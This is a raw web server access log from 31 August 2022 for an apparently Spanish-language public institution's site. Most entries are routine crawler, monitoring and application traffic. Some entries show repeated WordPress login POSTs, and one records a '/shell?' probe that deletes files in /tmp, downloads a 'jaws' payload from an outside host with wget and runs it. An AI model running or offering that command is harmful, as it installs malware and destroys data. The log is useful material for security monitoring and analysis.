201.245.192.253 - - [31/Aug/2022:01:27:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:01:26:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
185.119.81.105 - - [31/Aug/2022:01:28:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [31/Aug/2022:01:28:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [31/Aug/2022:01:28:30 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.16 - - [31/Aug/2022:01:29:48 -0500] "GET /bla/resoluciones/index.php?dir=autos+2002 HTTP/1.1" 200 1813
201.245.192.253 - - [31/Aug/2022:01:30:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42019
201.245.192.253 - - [31/Aug/2022:01:30:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42786
40.77.189.164 - - [31/Aug/2022:01:30:44 -0500] "GET /dlf/styles.css HTTP/1.1" 404 1018
77.88.5.174 - - [31/Aug/2022:01:30:45 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:01:32:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:01:31:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [31/Aug/2022:01:33:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:01:32:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53281
201.245.192.253 - - [31/Aug/2022:01:37:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
66.249.73.127 - - [31/Aug/2022:01:38:23 -0500] "-" 408 -
216.245.221.92 - - [31/Aug/2022:01:38:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:01:38:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
77.88.5.232 - - [31/Aug/2022:01:38:45 -0500] "-" 408 -
172.22.2.4 - - [31/Aug/2022:01:37:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:01:39:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [31/Aug/2022:01:37:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [31/Aug/2022:01:40:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42019
201.245.192.253 - - [31/Aug/2022:01:40:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42786
201.245.192.253 - - [31/Aug/2022:01:40:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
201.245.192.253 - - [31/Aug/2022:01:41:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:01:43:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:01:42:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:01:43:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53281
66.249.73.127 - - [31/Aug/2022:01:45:38 -0500] "-" 408 -
185.119.81.105 - - [31/Aug/2022:01:45:40 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [31/Aug/2022:01:45:41 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [31/Aug/2022:01:46:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
117.33.144.10 - - [31/Aug/2022:01:48:30 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [31/Aug/2022:01:48:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.241 - - [31/Aug/2022:01:48:45 -0500] "-" 408 -
157.55.39.108 - - [31/Aug/2022:01:49:16 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
157.55.39.108 - - [31/Aug/2022:01:49:26 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
172.22.2.4 - - [31/Aug/2022:01:48:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.26.172.125 - - [31/Aug/2022:01:50:55 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16185
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:50:56 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
190.26.172.125 - - [31/Aug/2022:01:50:59 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
190.26.172.125 - - [31/Aug/2022:01:50:59 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
190.26.172.125 - - [31/Aug/2022:01:51:00 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 52024
190.26.172.125 - - [31/Aug/2022:01:51:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1520
190.26.172.125 - - [31/Aug/2022:01:51:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 143036
190.26.172.125 - - [31/Aug/2022:01:51:15 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:15 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.172.125 - - [31/Aug/2022:01:51:15 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [31/Aug/2022:01:49:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
66.249.73.127 - - [31/Aug/2022:01:51:24 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:01:51:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [31/Aug/2022:01:53:30 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.16 - - [31/Aug/2022:01:53:59 -0500] "GET /forest/ HTTP/1.1" 200 12041
185.119.81.100 - - [31/Aug/2022:01:55:34 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [31/Aug/2022:01:55:35 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [31/Aug/2022:01:54:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [31/Aug/2022:01:56:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:01:55:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53281
66.249.73.127 - - [31/Aug/2022:01:57:31 -0500] "-" 408 -
216.245.221.92 - - [31/Aug/2022:01:58:30 -0500] "HEAD / HTTP/1.1" 200 -
77.88.5.157 - - [31/Aug/2022:01:58:45 -0500] "-" 408 -
185.119.81.107 - - [31/Aug/2022:02:01:21 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [31/Aug/2022:02:01:22 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [31/Aug/2022:02:01:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:02:00:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.8 - - [31/Aug/2022:02:02:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 220063
172.22.2.4 - - [31/Aug/2022:02:01:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [31/Aug/2022:02:03:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [31/Aug/2022:02:04:07 -0500] "-" 408 -
201.245.192.253 - - [31/Aug/2022:02:06:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:02:06:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.36 - - [31/Aug/2022:02:08:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/894.tif HTTP/1.1" 200 206436
216.245.221.92 - - [31/Aug/2022:02:08:30 -0500] "HEAD / HTTP/1.1" 200 -
93.158.161.55 - - [31/Aug/2022:02:08:45 -0500] "-" 408 -
222.253.159.38 - - [31/Aug/2022:02:08:46 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
172.22.2.4 - - [31/Aug/2022:02:07:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
222.253.159.38 - - [31/Aug/2022:02:08:52 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
128.1.248.42 - - [31/Aug/2022:02:09:45 -0500] "GET / HTTP/1.1" 200 319
66.249.73.127 - - [31/Aug/2022:02:10:05 -0500] "-" 408 -
40.77.167.52 - - [31/Aug/2022:02:11:14 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
185.119.81.100 - - [31/Aug/2022:02:11:20 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [31/Aug/2022:02:11:21 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [31/Aug/2022:02:11:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [31/Aug/2022:02:12:34 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
185.119.81.105 - - [31/Aug/2022:02:13:10 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [31/Aug/2022:02:13:11 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
216.245.221.92 - - [31/Aug/2022:02:13:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:02:12:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [31/Aug/2022:02:12:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50037
172.22.2.4 - - [31/Aug/2022:02:12:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51621
